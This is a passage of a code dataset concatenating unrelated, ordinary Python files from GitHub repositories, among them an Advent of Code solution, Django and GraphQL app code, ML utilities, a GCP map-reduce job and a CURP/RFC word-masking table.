fontsize=20)\ncoPlot.grid()\nvocPlot.grid()\n\nplt.savefig(\"image.png\")\n","repo_name":"simonvea/air_quality","sub_path":"createPlot.py","file_name":"createPlot.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"13398284362","text":"\"\"\"\nCreated on Mon Dec 7 20:13:04 2022\n\n@author: AllenKll\n--- Day 5: Supply Stacks ---\n--- Part Two ---\nAs you watch the crane operator expertly rearrange the crates, you notice the process isn't following your prediction.\n\nSome mud was covering the writing on the side of the crane, and you quickly wipe it away. The crane isn't a CrateMover 9000 - it's a CrateMover 9001.\n\nThe CrateMover 9001 is notable for many new and exciting features: air conditioning, leather seats, an extra cup holder, and the ability to pick up and move multiple crates at once.\n\nAgain considering the example above, the crates begin in the same configuration:\n\n [D] \n[N] [C] \n[Z] [M] [P]\n 1 2 3 \nMoving a single crate from stack 2 to stack 1 behaves the same as before:\n\n[D] \n[N] [C] \n[Z] [M] [P]\n 1 2 3 \nHowever, the action of moving three crates from stack 1 to stack 3 means that those three moved crates stay in the same order, resulting in this new configuration:\n\n [D]\n [N]\n [C] [Z]\n [M] [P]\n 1 2 3\nNext, as both crates are moved from stack 2 to stack 1, they retain their order as well:\n\n [D]\n [N]\n[C] [Z]\n[M] [P]\n 1 2 3\nFinally, a single crate is still moved from stack 1 to stack 2, but now it's crate C that gets moved:\n\n [D]\n [N]\n [Z]\n[M] [C] [P]\n 1 2 3\nIn this example, the CrateMover 9001 has put the crates in a totally different order: MCD.\n\nBefore the rearrangement process finishes, update your simulation so that the Elves know where they should stand to be ready to unload the final supplies. After the rearrangement procedure completes, what crate ends up on top of each stack?\n\nYour puzzle answer was TZLTLWRNF.\n\n\n\n\"\"\"\nfrom collections import deque\n\nfile = open(\"input.txt\", \"r\") # , newline='\\r\\n')\n# file = open(\"debug.txt\", \"r\" ) #, newline='\\r\\n')\nline = file.readline()\n\n#reading in the starting positions would be a pain in the ass due to the format, so we will hard code them.\n\"\"\"\n[M] [N] [Z] \n[F] [R] [Z] [C] [C] \n[C] [V] [L] [N] [G] [V] \n[W] [L] [T] [H] [V] [F] [H]\n[T] [T] [W] [F] [B] [P] [J] [L]\n[D] [L] [H] [J] [C] [G] [S] [R] [M]\n[L] [B] [C] [P] [S] [D] [M] [Q] [P]\n[B] [N] [J] [S] [Z] [W] [F] [W] [R]\n 1 2 3 4 5 6 7 8 9 \n\"\"\"\n\nstacks = []\nstacks.append( list('MFCWTDLB'))\nstacks.append( list('LBN'))\nstacks.append( list('VLTHCJ'))\nstacks.append( list('WJPS'))\nstacks.append( list('RLTFCSZ'))\nstacks.append( list('ZNHBGDW'))\nstacks.append( list('NCGVPSMF'))\nstacks.append( list('ZCVFJRQW'))\nstacks.append( list('HLMPR'))\n\ndef doMove(fromStack, toStack, numItems):\n moving = stacks[fromStack-1][:numItems]\n del(stacks[fromStack-1][:numItems])\n stacks[toStack-1] = moving + stacks[toStack-1]\n\nlineNumber = 11\n\nwhile line:\n line = line.strip()\n \n if not \"move\" in line:\n line = file.readline()\n continue\n \n splt = line.split(' ')\n numItems = eval(splt[1])\n fromStack = eval(splt[3])\n toStack = eval(splt[5])\n\n doMove(fromStack, toStack, numItems)\n\n line = file.readline()\n lineNumber = lineNumber + 1\n\noutput = []\nfor stack in stacks:\n output.append(stack[0])\n\nprint(\"\".join(output))","repo_name":"AllenKll/Banano-Advent-of-Code-2022","sub_path":"Day5/Part2.py","file_name":"Part2.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"44887795518","text":"class autobuses:\n sTarifa = 1.20\n def __init__(self, c_model = \"\", c_capacidad = 0, c_ruta = \"\"):\n self.model = c_model\n self.capacidad = c_capacidad\n self.ruta = c_ruta\n\na = autobuses(\"mercedaco\", 3000, \"pol poblao\")\nprint(a.sTarifa)\na.sTarifa = 300\nprint(a.sTarifa)\nb = autobuses(\"citroen\", 5, \"viladecans\")\nautobuses.sTarifa = 400\nprint(autobuses.sTarifa)\nprint(a.sTarifa)\nprint(b.sTarifa)\n","repo_name":"alexcatmu/CFGS_DAM","sub_path":"SEGUNDO/M3-POOpython/ejercicios/clases_atributos/autobuses.py","file_name":"autobuses.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"1220961075","text":"from django.urls import path, include\nfrom .views import *\n\nurlpatterns = [\n\t# path('', views.index, name='index'),\n\tpath('signup/', SignupView.as_view(), name='signup'),\n\tpath('login/', LoginView.as_view(), name='login'),\n\tpath('file-upload/', FileUpload.as_view(), name='file-upload'),\n\tpath('file-listing/', MyFile.as_view(), name='file-listing'),\n]\n","repo_name":"ryan191188/file-sensitivity","sub_path":"fapi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"10915535347","text":"import random\nimport numpy as np\nimport torch\nfrom torch.utils.data.sampler import SubsetRandomSampler\nfrom torch.utils.data import Dataset, DataLoader\n\ndef get_cat_cont_feats(df,contfeats):\n \n categorical = df.drop(['target'] + contfeats,\n axis=1).columns\n\n return categorical,contfeats\n\n\ndef set_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n \n torch.manual_seed(seed)\n torch.backends.cudnn.deterministick = True\n torch.backends.cudnn.benchmark = False \n\n\ndef split_dataset(trainset, valid_size=0.2, batch_size=64):\n num_train = len(trainset)\n \n indices = list(range(num_train))\n np.random.shuffle(indices)\n \n split = int(np.floor(valid_size * num_train))\n \n valid_idx, train_idx = indices[:split], indices[split:]\n \n valid_sampler = SubsetRandomSampler(valid_idx)\n train_sampler = SubsetRandomSampler(train_idx)\n \n valid_loader = DataLoader(trainset, \n batch_size=batch_size, \n sampler=valid_sampler)\n train_loader = DataLoader(trainset, \n batch_size=batch_size, \n sampler=train_sampler)\n \n return train_loader, valid_loader\n\n\ndef cat_dim(all_df,cats):\n \n embedding_cardinality = {n: c.nunique()+1 for n,c in all_df[cats].items()}\n emb_sizes = [(size, max(5, size//2)) for item, size in embedding_cardinality.items()]\n\n return emb_sizes\n\n ","repo_name":"Nandhagopalan/Structuring_Projects","sub_path":"Pytorch_Framework/src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"31068334835","text":"from odoo import fields, models\n\n\nclass Moderation(models.Model):\n _name = 'mail.moderation'\n _description = 'Channel black/white list'\n\n email = fields.Char(string=\"Email\", index=True, required=True)\n status = fields.Selection([\n ('allow', 'Always Allow'),\n ('ban', 'Permanent Ban')],\n string=\"Status\", required=True)\n channel_id = fields.Many2one('mail.channel', string=\"Channel\", index=True, required=True)\n\n _sql_constraints = [\n ('channel_email_uniq', 'unique (email,channel_id)', 'The email address must be unique per channel !')\n ]\n","repo_name":"Kinal-dev/crm","sub_path":"addons/mail/models/mail_moderation.py","file_name":"mail_moderation.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"37236052978","text":"nota1 = 3.4 # primera nota\nnota2 = 4\nnota3 = 2.6\nnota4 = 4.7\n\npromedio = ((nota1 + nota2 + nota3 + nota4)/4)\n\nprint(promedio)\n\ndef cal_promedio(n1,n2,n3,n4):\n result = ((n1 + n2 + n3 + n4)/4)\n result = round(result,3)\n # return \"el promedio de las notas es : \" + str(result)\n return \"el promedio de las notas es : \" + str(result)\n\n\nprint(cal_promedio(nota1, nota2, nota3, nota4))\n\n\ndef cal_promedio_tu(list_notas):\n result = (sum(list_notas)/len(list_notas))\n return result\n\nnotas = (3.4,4,2.6,4.7)\nnotas_antes = (3.4,4,2.6,4.7,2.5)\n\nmi_result_tu = cal_promedio_tu(notas_antes)\nprint(mi_result_tu)\nprint(type(notas))","repo_name":"Juliancamilo97/EJERCICIOS-1.py","sub_path":"Ejercicio5.py","file_name":"Ejercicio5.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"21575558807","text":"\nfrom django import template\n\nfrom apps.notification.models import notification\n\nregister = template.Library()\n\n@register.filter\ndef has_unread_notif(user):\n notifications = notification.objects.filter(user__Username__username=user, status=False)\n print(notifications)\n if notifications.exists():\n return True\n return False","repo_name":"Nidhip859/Flamboyant","sub_path":"apps/notification/templatetags/notification_tags.py","file_name":"notification_tags.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"25698166842","text":"from __future__ import absolute_import, division, print_function, unicode_literals\r\nfrom tensorflow import keras\r\nimport ImageProcessor as ip\r\n\r\ndef convertSciToFloat(numAsStr):\r\n try:\r\n if ('e' in numAsStr) & (len(numAsStr) > 0):\r\n x = numAsStr.split('e')\r\n return float(x[0]) * (10 ** float(x[1]))\r\n else:\r\n return float(numAsStr)\r\n except ValueError as e:\r\n return 0\r\n\r\ndef formatPredictions(predictions):\r\n predictionsAsString = \"\"\r\n for x in predictions:\r\n for y in x:\r\n predictionsAsString = predictionsAsString + str(y) + \",\"\r\n predictionsAsString = predictionsAsString + \"|\"\r\n return predictionsAsString\r\n\r\ntrain_images = ip.train_nparray\r\ntrain_labels = ip.train_labels\r\ntest_images = ip.validation_nparray\r\ntest_labels = ip.validation_labels\r\n\r\nmodel = keras.Sequential([\r\n keras.layers.Flatten(input_shape=(168, 300, 3)),\r\n keras.layers.Dense(128, activation='relu'),\r\n keras.layers.Dense(10, activation='softmax')\r\n])\r\n\r\nmodel.compile(optimizer='adam',\r\n loss='sparse_categorical_crossentropy',\r\n metrics=['accuracy'])\r\n\r\nmodel.fit(train_images, train_labels, epochs=10)\r\n\r\ntest_loss, test_acc = model.evaluate(test_images, test_labels, verbose=2)\r\n\r\nprint('\\n\\nTest accuracy: %{0}\\n\\n'.format(test_acc * 100))\r\n\r\n\r\ndef runTest():\r\n print(\"Test should find two Closed and one Open\")\r\n predictions = model.predict(test_images)\r\n predictionsAsString = formatPredictions(predictions)\r\n predictionsStringList = predictionsAsString.split(\"|\")\r\n predictions = []\r\n testPredictionsIndex = []\r\n for x in predictionsStringList:\r\n predictions.append([convertSciToFloat(y) for y in x.split(\",\")])\r\n predictions = [x for x in predictions if len(x) > 1]\r\n for x in predictions:\r\n testPredictionsIndex.append(x.index(max(x)))\r\n for x in testPredictionsIndex:\r\n print([\"Closed\", \"Open\"][x])\r\n","repo_name":"MarkHauen/ImageLearning","sub_path":"Predictor.py","file_name":"Predictor.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"70161503324","text":"# def 函数名:\n# 函数体\n# 函数名()\n\n# 函数必须先定义才能使用\n\n# 默认参数\ndef one(name, sex, age=16, city='北京'):\n print(name, sex, age, city)\n\n\n# one('bod', '男', 10)\n#\n# one('sd', 'girl', city='上海')\n\n# 可变参数\n\ndef two(*arg):\n print(arg)\n\n\ntwo(1, 2, 3)\na = [1, 2, 3, 4]\nb = (1, 2, 3, 4)\nc = {\n \"a\": 1,\n \"b\": 2\n}\ntwo(*a)\ntwo(*b)\ntwo(c)\n\n\n# 关键字 参数\n\n# def 函数名( 参数,参数,**关键字):\n# 函数体\n# 函数名(参数,参数,键='值')\n\ndef start(name, age, **kwargs):\n print(name, age, kwargs)\n\n\nstart('yang', 23, sex='boy', hight=178)\n\nkw = {\n 'sex': 'boy',\n 'height': 176\n}\nstart('yang', 23, **kw)\n\n\n# 函数返回值\n# 函数体中 没有 return 函数的返回值是 none\n# 函数体中 返回多个值 用逗号 分隔 返回值的类型是一个元组 例如: return 字符串,数值,列表,元组,字典 。。。。。\n\n","repo_name":"yang529593122/python_study","sub_path":"study_01/fun.py","file_name":"fun.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"23373250843","text":"class Solution:\n def frequencySort(self, s: str) -> str:\n d = {}\n for c in s:\n if c not in d:\n d[c] = 1\n else:\n d[c] += 1\n res = \"\"\n a = sorted(d.items(), key=lambda x: x[1], reverse=True)\n for k,v in a:\n res += k*v\n return res","repo_name":"zzz0906/LeetCode","sub_path":"Scripts/451.py","file_name":"451.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"86"} +{"seq_id":"34487464776","text":"# luiz.augusto.farias@ccc.ufcg.edu.br \n\ndef move_direita(labirinto):\n for i in range(len(labirinto)):\n for j in range(len(labirinto[0])):\n if labirinto[i][j] == '*' and labirinto[i][j + 1] == ' ':\n labirinto[i][j], labirinto[i][j + 1] = labirinto[i][j + 1], labirinto[i][j]\n return (i , j + 1)\n \n if labirinto[i][j] == '*' and labirinto[i][j + 1] != ' ':\n resultado = (i, j)\n break\n \n return resultado\n\nlabirinto1 = [\n ['P', '*', ' ', ' '],\n ['P', ' ', 'P', ' '],\n ['P', 'P', 'P', ' '],\n]\n\nassert move_direita(labirinto1) == (0, 2)\n\nassert labirinto1 == [\n ['P', ' ', '*', ' '],\n ['P', ' ', 'P', ' '],\n ['P', 'P', 'P', ' '],\n]\n\nlabirinto2 = [\n ['P', 'P', ' ', ' '],\n ['P', '*', 'P', ' '],\n ['P', 'P', 'P', ' '],\n]\nassert move_direita(labirinto2) == (1, 1)","repo_name":"luizaugustoliveira/Algoritmos","sub_path":"Matrizes/labir_move_direita/move.py","file_name":"move.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"73661039004","text":"import kenlm\nimport streamlit as st\nfrom lm import *\n\n# load and prepare model to correct words\nmodel = kenlm.LanguageModel(\"language_model/airi.bin\")\nmodel.vocab = prepare_unigram_set(\"language_model/airi.arpa\", model)\n\nst.header(\"Text corrector\")\n# Store the initial value of widgets in session state\nst.session_state.visibility = \"visible\"\nst.session_state.disabled = False\n\ncol1, col2 = st.columns(2)\n\nwith col1:\n st.write(\"Your input sentence:\")\n input_sentence = st.text_area(\n label=\"Enter sentence\",\n height=200\n )\n if input_sentence:\n with col2:\n st.write(\"Corrected sentence:\")\n st.session_state.disabled = True\n text_input = st.text_area(\n label=\"result\",\n value=recycle_sentence(model, input_sentence),\n label_visibility=st.session_state.visibility,\n disabled=st.session_state.disabled,\n height=200\n )\n ","repo_name":"shoxa0707/Text-Corrector-With-Kenlm","sub_path":"stream.py","file_name":"stream.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"21865973957","text":"import graphene\nfrom graphene_django.filter import DjangoFilterConnectionField\n\nfrom . import filters\n\nfrom .resolvers import (\n resolve_cash_flow,\n resolve_cash_flows,\n resolve_company_cashbox,\n resolve_company_cashboxs,\n resolve_holding_cashbox,\n resolve_holding_cashboxs,\n resolve_office_cashbox,\n resolve_office_cashboxs\n)\n\nfrom . types import (\n HoldingCashboxNode,\n CompanyCashboxNode,\n OfficeCashboxNode,\n CashFlowNode\n)\n\nfrom .mutations import (\n company_cashbox_mutations,\n holding_cashbox_mutations,\n office_cashbox_mutations\n)\n\nfrom core.permissions import IsAdminUser\nfrom django_graphene_permissions import permissions_checker\nfrom api.cashbox.permissions import (\n company_cashbox_permissions,\n holding_cashbox_permissions,\n office_cashbox_permissions,\n cash_flow_permissions\n)\n\n\nclass HoldingCashboxQuery(graphene.ObjectType):\n holding_cashbox = graphene.Field(HoldingCashboxNode, description=\"Look up a holding cashbox by ID.\",\n id=graphene.Argument(graphene.ID, description=\"ID for a holding cashbox\", required=True))\n\n holding_cashboxs = DjangoFilterConnectionField(\n HoldingCashboxNode,\n description=\"List of holding cashboxs.\",\n filterset_class=filters.HoldingCashboxFilter,\n )\n\n @permissions_checker([holding_cashbox_permissions.HoldingCashboxReadPermissions])\n def resolve_holding_cashbox(self, info, **data):\n id = data.get(\"id\")\n return resolve_holding_cashbox(id)\n\n @permissions_checker([holding_cashbox_permissions.HoldingCashboxReadPermissions])\n def resolve_holding_cashboxs(self, info, **_kwargs):\n return resolve_holding_cashboxs()\n\n\nclass CompanyCashboxQuery(graphene.ObjectType):\n company_cashbox = graphene.Field(CompanyCashboxNode, description=\"Look up a company cashbox by ID.\",\n id=graphene.Argument(graphene.ID, description=\"ID for a company cashbox\", required=True))\n\n company_cashboxs = DjangoFilterConnectionField(\n CompanyCashboxNode,\n description=\"List of company cashboxs.\",\n filterset_class=filters.CompanyCashboxFilter,\n )\n\n @permissions_checker([company_cashbox_permissions.CompanyCashboxReadPermissions])\n def resolve_company_cashbox(self, info, **data):\n id = data.get(\"id\")\n return resolve_company_cashbox(id)\n\n @permissions_checker([company_cashbox_permissions.CompanyCashboxReadPermissions])\n def resolve_company_cashboxs(self, info, **_kwargs):\n return resolve_company_cashboxs()\n\n\nclass OfficeCashboxQuery(graphene.ObjectType):\n office_cashbox = graphene.Field(OfficeCashboxNode, description=\"Look up a office cashbox by ID.\",\n id=graphene.Argument(graphene.ID, description=\"ID for a office cashbox\", required=True))\n\n office_cashboxs = DjangoFilterConnectionField(\n OfficeCashboxNode,\n description=\"List of office cashboxs.\",\n filterset_class=filters.OfficeCashboxFilter,\n )\n\n @permissions_checker([office_cashbox_permissions.OfficeCashboxReadPermissions])\n def resolve_office_cashbox(self, info, **data):\n id = data.get(\"id\")\n return resolve_office_cashbox(id)\n\n @permissions_checker([office_cashbox_permissions.OfficeCashboxReadPermissions])\n def resolve_office_cashboxs(self, info, **_kwargs):\n return resolve_office_cashboxs()\n\nclass CashFlowQuery(graphene.ObjectType):\n cash_flow = graphene.Field(CashFlowNode, description=\"Look up a cash flow by ID.\",\n id=graphene.Argument(graphene.ID, description=\"ID for a cash flow\", required=True))\n\n cash_flows = DjangoFilterConnectionField(\n CashFlowNode,\n description=\"List of cash flows.\",\n filterset_class=filters.CashFlowFilter,\n )\n\n @permissions_checker([cash_flow_permissions.CashFlowReadPermissions])\n def resolve_cash_flow(self, info, **data):\n id = data.get(\"id\")\n return resolve_cash_flow(id)\n\n @permissions_checker([cash_flow_permissions.CashFlowReadPermissions])\n def resolve_cash_flows(self, info, **_kwargs):\n return resolve_cash_flows()\n \n# ----------------------- Mutations ---------------------------------------\n\n\nclass HoldingCashboxMutations(graphene.ObjectType):\n create_holding_cashbox = holding_cashbox_mutations.CreateHoldingCashbox.Field()\n update_holding_cashbox = holding_cashbox_mutations.UpdateHoldingCashbox.Field()\n \nclass CompanyCashboxMutations(graphene.ObjectType):\n create_company_cashbox = company_cashbox_mutations.CreateCompanyCashbox.Field()\n update_company_cashbox = company_cashbox_mutations.UpdateCompanyCashbox.Field()\n \nclass OfficeCashboxMutations(graphene.ObjectType):\n create_office_cashbox = office_cashbox_mutations.CreateOfficeCashbox.Field()\n update_office_cashbox = office_cashbox_mutations.UpdateOfficeCashbox.Field()\n ","repo_name":"abbasguliyev/erp_graphql_api","sub_path":"app/api/cashbox/schema.py","file_name":"schema.py","file_ext":"py","file_size_in_byte":4953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"4464799795","text":"\r\ndef userinput() :\r\n while True :\r\n try :\r\n user_input = input(\"날짜를 입력하세요. ex)20020304 :\")\r\n if len(user_input) != 8 :\r\n print(\"년월일 포함 8자리로 입력해주세요\")\r\n continue\r\n year = int(user_input[:4])\r\n month = int(user_input[4:6])\r\n day = int(user_input[6:])\r\n break\r\n except :\r\n print(\"Please enter numeric input.\")\r\n return year, month, day\r\n\r\ndef is_month_change(x, y, z) : # 30 or 31일이 넘으면 True값 반환\r\n a = [i for i in range(1, 13)]\r\n b = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\r\n if y in a :\r\n day_in_month = b[a.index(y)]\r\n if z > day_in_month:\r\n return True\r\n else:\r\n return False\r\n\r\ndef calender_2022(x, y, z) : # 윤년을 고려하지 않은 달력\r\n a = [i for i in range(1, 13)]\r\n b = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\r\n if y in a :\r\n for i in range(0, a.index(y)) :\r\n z = z + b[i]\r\n day_of_week = [\"월\", \"화\", \"수\", \"목\", \"금\", \"토\", \"일\"]\r\n # jan_1st = day_of_week[5]\r\n find_day = (x - 2022 + 5 + z - 1) % 7\r\n d = day_of_week[find_day]\r\n return d\r\n\r\ndef calculate(x, y, z) : # 100일 계산기\r\n for i in range(100) :\r\n z += 1 # 날짜에 +1씩 더함\r\n if is_month_change(x, y, z) : # 30 or 31 이 넘으면 월+1\r\n z = 1\r\n y += 1\r\n if y > 12 : # 12월이 넘으면 연+1\r\n y = 1\r\n x += 1\r\n return x, y, z\r\n\r\nyear, month, day = userinput()\r\ninput_day = (calender_2022(year, month, day))\r\na, b, c = calculate(year, month, day)\r\nd = (calender_2022(a, b, c))\r\nprint(f\"{year}년{month}월{day}일 {input_day}요일부터 100일 뒤는 {a}년{b}월{c}일 {d}요일\")\r\n","repo_name":"Narks-Jun/Python_study_5Week","sub_path":"5 Week Mission Q4(100 day calculator(Base is 2022, ignore leap years).py","file_name":"5 Week Mission Q4(100 day calculator(Base is 2022, ignore leap years).py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"44083445169","text":"#!/usr/bin/env python\n\nfrom argparse import ArgumentParser\n\nfrom transformers.models.auto.configuration_auto import CONFIG_MAPPING\nfrom transformers.models.auto.modeling_auto import AutoModelForCausalLM\nfrom transformers.models.auto.modeling_auto import MODEL_FOR_CAUSAL_LM_MAPPING\nfrom transformers.models.auto.tokenization_auto import TOKENIZER_MAPPING\nfrom transformers.models.auto.tokenization_auto import AutoTokenizer\nfrom transformers.pipelines.text_generation import TextGenerationPipeline\nfrom transformers.models.t5.configuration_t5 import T5Config\n\nfrom uniformers.models.bygpt5 import ByGPT5Config, ByGPT5LMHeadModel, ByGPT5Tokenizer\n\n# fix some warnings inside pipeline\n# we need to add this to to be able to use ByGPT5 with AutoModel\nCONFIG_MAPPING.register(ByGPT5Config.model_type, ByGPT5Config)\nTOKENIZER_MAPPING.register(ByGPT5Config, (ByGPT5Tokenizer, None))\nMODEL_FOR_CAUSAL_LM_MAPPING.register(ByGPT5Config, ByGPT5LMHeadModel)\nMODEL_FOR_CAUSAL_LM_MAPPING.register(T5Config, ByGPT5LMHeadModel)\n\n\ndef generate(model_name, prompt, device, min_length=512, max_length=1024):\n pipeline = TextGenerationPipeline(\n model=AutoModelForCausalLM.from_pretrained(model_name),\n tokenizer=AutoTokenizer.from_pretrained(model_name),\n device=device,\n )\n return pipeline(\n prompt,\n min_length=min_length,\n max_length=max_length,\n do_sample=True,\n #num_beams=5,\n # same default settings as textsynth.com\n top_k=40,\n temperature=1,\n top_p=0.9,\n )[0][\"generated_text\"]\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(\n description=\"Generate text using a pretrained ByGPT5 model.\"\n )\n parser.add_argument(\"--prompt\", help=\"prompt to complete\", required=True)\n parser.add_argument(\n \"--model_name_or_path\",\n default=\"google/byt5-small\",\n help=\"name of the model in huggingface hub or path if local\",\n )\n parser.add_argument(\n \"--device\",\n default=-1,\n type=int,\n help=\"device ordinal for cpu/gpu, setting this to -1 will leverage cpu\",\n )\n args = parser.parse_args()\n print(generate(args.model_name_or_path, args.prompt, args.device))\n","repo_name":"potamides/uniformers","sub_path":"examples/inference/lm_generate.py","file_name":"lm_generate.py","file_ext":"py","file_size_in_byte":2217,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"86"} +{"seq_id":"20967882548","text":"import master\nfrom google.cloud import storage\nfrom collections import defaultdict\nimport json\n\ndef master_main(request):\n \"\"\"Responds to any HTTP request.\n Args:\n request (flask.Request): HTTP request object.\n Returns:\n The response text or any set of values that can be turned into a\n Response object using\n `make_response `.\n \"\"\"\n request_json = request.get_json()\n if request.args and 'message' in request.args:\n return request.args.get('message')\n elif request_json and 'message' in request_json:\n return request_json['message']\n else:\n # return f'Hello World!'\n print(\"Inside main function\")\n m = master.Master() \n print(\"Created master object\")\n # map_paths = m.split_files('A Room With A View.txt', 3, flag = None)\n m = master.Master() \n n_mappers = 3\n n_reducers = 3\n map_paths = m.split_files('A Room With A View.txt', n_mappers, flag = None)\n m.run_mapper(n_mappers, map_paths)\n m.run_reducer(n_mappers, n_reducers)\n\n storage_client = storage.Client()\n output_bucket = storage.Bucket(storage_client, \"output_anurag\")\n\n\n final_dict = defaultdict()\n blobs = output_bucket.list_blobs()\n for blob in blobs:\n # fileName = blob.name\n partition_kv = defaultdict()\n with blob.open(\"r\") as f:\n partition_kv = json.load(f)\n final_dict.update(partition_kv)\n blob.delete()\n\n output_blob = output_bucket.blob(\"output.txt\").open(\"w\")\n output_blob.write(json.dumps(final_dict))\n output_blob.close()\n\n m.delete_files()\n return f\"Finished processing\"","repo_name":"anuraghambir/Map-Reduce-GCP","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"3433956709","text":"import pandas as pd\nimport requests, argparse\nimport os, json\nimport numpy as np\nimport math\n\ndata = pd.read_csv('../data/covid19_wordwide_data.csv')\ndata = data.replace(np.nan, 'NaN')\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--server_address', type=str, default='http://127.0.0.1:5000/', help='The IP address that hosts the API')\n parser.add_argument('--method', type=str, default='ingest', help='ingest/clear')\n return parser.parse_args()\n\nif __name__ == \"__main__\":\n args = parse_args()\n \n # batch ingesting\n if args.method == 'ingest':\n ingested_dict = data.loc[data.index,:].to_dict(orient='records')\n request = requests.post(args.server_address+'ingestion', json=ingested_dict)\n print('Request status:', request.reason) \n\n # clear table\n elif args.method == 'clear':\n request = requests.post(args.server_address+'clear', json={})\n print('Request status:', request.reason)\n\n ","repo_name":"phihd/big-data-platform-assignment-1","sub_path":"code/from_consumer-producer_to_daas.py","file_name":"from_consumer-producer_to_daas.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"70356518363","text":"CURP_NON_CONVENIENT_WORDS = {\n \"BACA\": \"BXCA\",\n \"LOCO\": \"LXCO\",\n \"BAKA\": \"BXKA\",\n \"LOKA\": \"LXKA\",\n \"BUEI\": \"BXEI\",\n \"LOKO\": \"LXKO\",\n \"BUEY\": \"BXEY\",\n \"MAME\": \"MXME\",\n \"CACA\": \"CXCA\",\n \"MAMO\": \"MXMO\",\n \"CACO\": \"CXCO\",\n \"MEAR\": \"MXAR\",\n \"CAGA\": \"CXGA\",\n \"MEAS\": \"MXAS\",\n \"CAGO\": \"CXGO\",\n \"MEON\": \"MXON\",\n \"CAKA\": \"CXKA\",\n \"MIAR\": \"MXAR\",\n \"CAKO\": \"CXKO\",\n \"MION\": \"MXON\",\n \"COGE\": \"CXGE\",\n \"MOCO\": \"MXCO\",\n \"COGI\": \"CXGI\",\n \"MOKO\": \"MXKO\",\n \"COJA\": \"CXJA\",\n \"MULA\": \"MXLA\",\n \"COJE\": \"CXJE\",\n \"MULO\": \"MXLO\",\n \"COJI\": \"CXJI\",\n \"NACA\": \"NXCA\",\n \"COJO\": \"CXJO\",\n \"NACO\": \"NXCO\",\n \"COLA\": \"CXLA\",\n \"PEDA\": \"PXDA\",\n \"CULO\": \"CXLO\",\n \"PEDO\": \"PXDO\",\n \"FALO\": \"FXLO\",\n \"PENE\": \"PXNE\",\n \"FETO\": \"FXTO\",\n \"PIPI\": \"PXPI\",\n \"GETA\": \"GXTA\",\n \"PITO\": \"PXTO\",\n \"GUEI\": \"GXEI\",\n \"POPO\": \"PXPO\",\n \"GUEY\": \"GXEY\",\n \"PUTA\": \"PXTA\",\n \"JETA\": \"JXTA\",\n \"PUTO\": \"PXTO\",\n \"JOTO\": \"JXTO\",\n \"QULO\": \"QXLO\",\n \"KACA\": \"KXCA\",\n \"RATA\": \"RXTA\",\n \"KACO\": \"KXCO\",\n \"ROBA\": \"RXBA\",\n \"KAGA\": \"KXGA\",\n \"ROBE\": \"RXBE\",\n \"KAGO\": \"KXGO\",\n \"ROBO\": \"RXBO\",\n \"KAKA\": \"KXKA\",\n \"RUIN\": \"RXIN\",\n \"KAKO\": \"KXKO\",\n \"SENO\": \"SXNO\",\n \"KOGE\": \"KXGE\",\n \"TETA\": \"TXTA\",\n \"KOGI\": \"KXGI\",\n \"VACA\": \"VXCA\",\n \"KOJA\": \"KXJA\",\n \"VAGA\": \"VXGA\",\n \"KOJE\": \"KXJE\",\n \"VAGO\": \"VXGO\",\n \"KOJI\": \"KXJI\",\n \"VAKA\": \"VXKA\",\n \"KOJO\": \"KXJO\",\n \"VUEI\": \"VXEI\",\n \"KOLA\": \"KXLA\",\n \"VUEY\": \"VXEY\",\n \"KULO\": \"KXLO\",\n \"WUEI\": \"WXEI\",\n \"LILO\": \"LXLO\",\n \"WUEY\": \"WXEY\",\n \"LOCA\": \"LXCA\",\n}\n\nRFC_NON_CONVENIENT_WORDS = {\n \"BUEI\": \"BUEX\",\n \"KOGE\": \"KOGX\",\n \"BUEY\": \"BUEX\",\n \"KOJO\": 